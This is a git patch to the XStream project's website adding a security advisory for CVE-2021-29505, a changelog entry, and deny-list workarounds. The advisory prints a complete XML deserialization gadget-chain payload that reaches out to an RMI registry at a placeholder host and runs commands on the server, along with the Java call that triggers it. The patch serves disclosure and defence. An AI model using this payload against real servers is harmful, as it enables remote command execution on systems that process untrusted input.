From 24fac82191292c6ae25f94508d28b9823f83624f Mon Sep 17 00:00:00 2001 From: joehni Date: Mon, 10 May 2021 22:56:17 +0200 Subject: [PATCH] Add description of CVE-2021-29505 and bug fix. --- .../src/content/CVE-2021-29505.html | 119 ++++++++++++++++++ xstream-distribution/src/content/changes.html | 19 ++- .../src/content/security.html | 18 ++- xstream-distribution/src/content/website.xml | 1 + 4 files changed, 152 insertions(+), 5 deletions(-) create mode 100644 xstream-distribution/src/content/CVE-2021-29505.html diff --git a/xstream-distribution/src/content/CVE-2021-29505.html b/xstream-distribution/src/content/CVE-2021-29505.html new file mode 100644 index 000000000..378eab8b6 --- /dev/null +++ b/xstream-distribution/src/content/CVE-2021-29505.html @@ -0,0 +1,119 @@ + + + + CVE-2021-29505 + + + +

Vulnerability

+ +

CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.

+ +

Affected Versions

+ +

All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is + affected, who followed the recommendation to setup XStream's security + framework with a whitelist limited to the minimal required types.

+ +

Description

+ +

The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in execution of a local command on the server.

+ +

Steps to Reproduce

+ +

Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and + unmarshal it again with XStream:

+
<java.util.PriorityQueue serialization='custom'>
+  <unserializable-parents/>
+  <java.util.PriorityQueue>
+    <default>
+      <size>2</size>
+    </default>
+    <int>3</int>
+    <javax.naming.ldap.Rdn_-RdnEntry>
+      <type>12345</type>
+      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
+      </value>
+    </javax.naming.ldap.Rdn_-RdnEntry>
+    <javax.naming.ldap.Rdn_-RdnEntry>
+      <type>12345</type>
+      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+          <parsedMessage>true</parsedMessage>
+          <soapVersion>SOAP_11</soapVersion>
+          <bodyParts/>
+          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+            <attachmentsInitialized>false</attachmentsInitialized>
+            <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+              <soapPart/>
+              <mm>
+                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+                  <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
+                    <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
+                      <names>
+                        <string>aa</string>
+                        <string>aa</string>
+                      </names>
+                      <ctx>
+                        <environment/>
+                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
+                          <java.rmi.server.RemoteObject>
+                            <string>UnicastRef</string>
+                            <string>ip2</string>
+                            <int>1099</int>
+                            <long>0</long>
+                            <int>0</int>
+                            <short>0</short>
+                            <boolean>false</boolean>
+                          </java.rmi.server.RemoteObject>
+                        </registry>
+                        <host>ip2</host>
+                        <port>1099</port>
+                      </ctx>
+                    </candidates>
+                  </aliases>
+                </it>
+              </mm>
+            </multiPart>
+          </sm>
+        </message>
+      </value>
+    </javax.naming.ldap.Rdn_-RdnEntry>
+  </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+
+
XStream xstream = new XStream();
+xstream.fromXML(xml);
+
+ +

As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.

+ +

Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.

+ +

Impact

+ +

The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by + manipulating the processed input stream.

+ +

Workarounds

+ +

See workarounds for the different versions covering all CVEs.

+ +

Credits

+ +

V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.

+ + + diff --git a/xstream-distribution/src/content/changes.html b/xstream-distribution/src/content/changes.html index 19a8e2172..4cfe0f5a2 100644 --- a/xstream-distribution/src/content/changes.html +++ b/xstream-distribution/src/content/changes.html @@ -101,11 +101,26 @@

Stream compatibility

  • No support for Hibernate 3 collections.
    • - + +

    This maintenance release addresses the security vulnerability + CVE-2021-29505, when unmarshalling with XStream instances using an uninitialized + security framework.

    + +

    Stream compatibility

    + +

    1.4.16

    diff --git a/xstream-distribution/src/content/security.html b/xstream-distribution/src/content/security.html index 1115866e1..737961e7a 100644 --- a/xstream-distribution/src/content/security.html +++ b/xstream-distribution/src/content/security.html @@ -44,11 +44,20 @@

    Documented Vulnerabilities

    Exposure (CVE) system managed by the Mitre Corporation. Following a list of the reported vulnerabilities for the different versions:

    - +
    + + + + + + + + + @@ -393,8 +402,11 @@

    Workarounds for older XStream versions

    XStream xstream = new XStream();
 // add your allowed types, type hierarchies or packages here
    -

    Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can +

    Users of XStream 1.4.16 who insist to use XStream default blacklist - despite that clear recommendation - can add these lines to XStream's setup code:

    +
    xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });
+
    +

    Users of XStream 1.4.15 should additionally add these lines to the lines from above:

    xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "sun.swing.SwingLazyValue", "com.sun.corba.se.impl.activation.ServerTableEntry", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
 xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" });
 xstream.denyTypeHierarchy(java.io.InputStream.class );
@@ -402,7 +414,7 @@ 
    Workarounds for older XStream versions
    
 xstream.denyTypeHierarchy(javax.activation.DataSource.class );
 xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );
    -

    Users of XStream 1.4.13 should additionally add these two lines to the lines from above:

    +

    Users of XStream 1.4.14 and 1.4.13 should additionally add these two lines to the lines from above:

    xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
    diff --git a/xstream-distribution/src/content/website.xml b/xstream-distribution/src/content/website.xml index ed4df177c..7254d976a 100644 --- a/xstream-distribution/src/content/website.xml +++ b/xstream-distribution/src/content/website.xml @@ -74,6 +74,7 @@ CVE-2021-21349.htmlCVE-2021-21350.htmlCVE-2021-21351.html + CVE-2021-29505.htmlCVE-2020-26217.htmlCVE-2020-26258.htmlCVE-2020-26259.html
    CVE Description
    Version 1.4.16
    CVE-2021-29505XStream is vulnerable to a Remote Command Execution attack.
    Version 1.4.15